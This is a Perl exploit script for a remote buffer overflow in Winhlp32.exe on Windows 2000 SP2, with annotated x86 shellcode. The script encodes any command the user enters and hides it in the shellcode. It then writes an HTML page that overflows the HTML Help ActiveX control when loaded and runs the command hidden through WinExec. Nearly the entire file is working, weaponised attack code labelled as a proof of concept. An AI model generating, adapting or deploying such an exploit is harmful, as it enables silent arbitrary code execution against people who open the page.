Exploit code for the Winhlp32.exe remote buffer overflow vulnerability. Calls WinExec with SW_HIDE and executes the supplied command. Tested against Windows 2000 Professional SP2. The jmp-ebx gadget, the WinExec address and the exit-stub address are hard-coded for Kernel32.dll version 5.0.2195.4272 and must be re-located for any other build.
d51b5844b984733f335e621404e81da9ba3972f55afab24141b4eeba7aef7f17
# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com
# For use as proof of concept
# Kernel32.dll version 5.0.2195.4272
####### Kernel32 jmp ebx 77E87793
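use warnings;
# NOTE(review): `use strict` is deliberately not enabled here -- the original
# encode() at the bottom of this file relies on package globals; turn it on
# once that sub is strict-clean.

# --- Stage 1: marker scan + in-place decoder + WinExec call ----------------
# Control arrives here via the "jmp ebx" gadget in $EIP2, so ebx presumably
# points somewhere below the payload in the overflowed buffer -- TODO confirm.
# The stub walks forward from ebx until it finds the "zzzz" marker, decodes
# the command that follows it one byte at a time (subtracting 0x41, the
# inverse of encode() below) until the raw bytes ahead read "XXXX", turns that
# sentinel into a NUL terminator and calls WinExec(cmd, SW_HIDE).
my $sploit =
"\x55\x8b\xec\x8b\xc3".         # push ebp ; mov ebp,esp ; mov eax,ebx   (\xc5 = mov eax,ebp if the scan base is wrong)
"\xbe\xff\xff\xff\xff".         # mov esi, 0xffffffff
"\x81\xEE\x85\x85\x85\x85".     # sub esi, 0x85858585 -> esi = 0x7a7a7a7a ("zzzz"); built arithmetically so the scan below cannot match its own immediate
"\x83\xc0\x01".                 # scan:  add eax, 1
"\x8b\x10".                     #        mov edx, [eax]
"\x3b\xd6".                     #        cmp edx, esi
"\x75\xf7".                     #        jne scan
"\x8b\xd8".                     # mov ebx, eax              ; ebx -> "zzzz"
"\x83\xc3\x01".                 # decode: add ebx, 1
"\x80\x6b\x03\x41".             #        sub byte [ebx+3], 0x41   ; decode one command byte in place
"\x8b\x7b\x04".                 #        mov edi, [ebx+4]
"\x81\xff\x58\x58\x58\x58".     #        cmp edi, 0x58585858 ("XXXX")
"\x75\xEE".                     #        jne decode
"\x81\x6b\x04\x58\x58\x58\x58". # sub dword [ebx+4], 0x58585858 ; "XXXX" -> 0x00000000, NUL-terminates the command
"\x33\xf6".                     # xor esi, esi
"\x56".                         # push esi                  ; uCmdShow = SW_HIDE (0)
"\x83\xc0\x04".                 # add eax, 4
"\x50".                         # push eax                  ; lpCmdLine -> decoded command (just past "zzzz")
"\xbb\x94\xee\xe8\x77".         # mov ebx, 0x77e8ee94       ; WinExec() in Kernel32.dll 5.0.2195.4272
"\xff\xd3";                     # call ebx

# --- Stage 2: exit stub -----------------------------------------------------
# Calls 0x77e8a95c; the immediate is stored one higher and decremented at
# runtime, presumably to keep a bad byte out of the payload.  The variable
# name suggests ExitProcess() in this Kernel32 build -- TODO confirm.
my $exitproc =
"\xBB\x5d\xa9\xe8\x77".         # mov ebx, 0x77e8a95d
"\x83\xeb\x01".                 # sub ebx, 1 -> 0x77e8a95c
"\xff\xd3";                     # call ebx

# Value written just before the return address; the original does not
# document which slot it fills (0x015df124) -- keep as-is.
my $RET  = "\x24\xF1\x5d\x01";
# Overwritten return address: "jmp ebx" in Kernel32.dll 5.0.2195.4272.
my $EIP2 = "\x93\x77\xe8\x77";  # 0x77e87793 -- this works
#my $EIP2 = "\xf6\xbf\x30\x78"; # alternative address kept from the original
# direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00";

# The command and the NOP sled together always occupy exactly this many
# bytes, so that $exitproc, $RET and $EIP2 land at the offsets the overflow
# expects.  A longer command would make the "x" repeat count negative (empty
# sled) and silently shift everything after it.
my $MAX_COMMAND = 123;

print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";
print "Enter Command to execute: ";
my $command = <STDIN>;
die "No command given\n" unless defined $command;
print "Enter Output File: ";
my $outputfile = <STDIN>;
die "No output file given\n" unless defined $outputfile;
chomp $command;
chomp $outputfile;

die "Command must be at most $MAX_COMMAND bytes (got " . length($command) . ")\n"
    if length($command) > $MAX_COMMAND;

# Three-argument open with an explicit mode so a file name such as ">>foo"
# cannot alter how the file is opened, and fail loudly instead of writing
# the payload nowhere.
open(my $out, '>', $outputfile) or die "Cannot open '$outputfile' for writing: $!\n";
binmode($out);  # raw bytes: no newline translation or encoding layer on the shellcode

# +65 per byte; the stage-1 stub undoes this with "sub byte [ebx+3], 0x41".
$command = encode($command);
my $nops    = "\x90" x ($MAX_COMMAND - length($command));
my $exploit = $sploit . "zzzz" . $command . 'XXXX' . $nops . $exitproc . $RET . $EIP2;

# HTML wrapper: the payload is delivered as the Item1 parameter of the
# HTML Help control and triggered by HHClick().
my $f1 = <<"file1";
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width"
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"
VALUE="WinHelp"><PARAM NAME="Item1"
VALUE='
file1
chomp $f1;  # the payload must follow VALUE=' directly, with no newline between them
my $f2 = <<"file2";
'><PARAM
NAME="Item2" VALUE="Sec-1 LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>
file2
print {$out} $f1 . $exploit . $f2;
close($out) or die "Error writing '$outputfile': $!\n";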
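# encode(COMMAND) -> STRING
#
# Obfuscates the command for transport: every byte is shifted up by 65
# (0x41), the same constant the stage-1 stub subtracts from each byte
# ("sub byte [ebx+3], 0x41") when it decodes the command in place.  The
# shift wraps modulo 256 so the output is always one byte per input byte;
# without the wrap, input bytes >= 0xBF would become characters above 0xFF,
# which print as multi-byte sequences and break the fixed payload layout.
#
# Takes the plain command as its argument (the original read the global
# $command instead, and accumulated its result in a global across calls).
# Returns the encoded string, the same length as the input ('' for '').
sub encode {
    my ($plain) = @_;
    $plain = '' unless defined $plain;

    my $shift   = 65;
    my $encoded = '';
    for my $code (map { ord } split //, $plain) {
        $encoded .= chr(($code + $shift) % 256);
    }
    return $encoded;
}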